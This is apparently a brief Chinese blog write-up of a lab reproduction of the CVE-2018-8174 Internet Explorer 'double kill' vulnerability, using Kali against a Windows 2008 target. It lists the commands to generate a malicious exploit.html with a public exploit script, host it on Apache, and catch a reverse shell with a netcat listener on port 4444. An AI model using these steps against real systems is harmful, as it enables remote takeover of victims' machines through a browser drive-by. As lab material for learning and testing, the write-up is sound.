CVE-2018-8174双杀漏洞复现总结
CVE-2018-8174双杀漏洞复现总结
记录⼀下CVE-2018-8174双杀漏洞的复现过程~
漏洞原理环境说明攻击机:kali
靶机:windows2008
漏洞复现
cve漏洞库
1. 在kali上下载exp
也可以下载到本地 ⼿动上传到kali上去
2. 进⼊exp⽬录,⽣成payload cd CVE-2018-8174_EXP-master
python CVE-2018-8174.py -u #{kali 的ip}/ -f -i #{kali 的ip} -p 4444
(其中各个参数的说明:-u是设置url地址;-o表⽰输出⽂件;-i表⽰设置监听地址;-p表⽰设置监听端⼝)
3. 把 explot.html 复制到 /var/www/html ⽬录下,并开启 apache 服务
4. 在kali上开启监听
nc -lvvp 4444
5. ⾄此就可以复现成功啦~
cp  exploit.html /var/www/html/
cp  f /var/www/html/
service  apache2 start

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。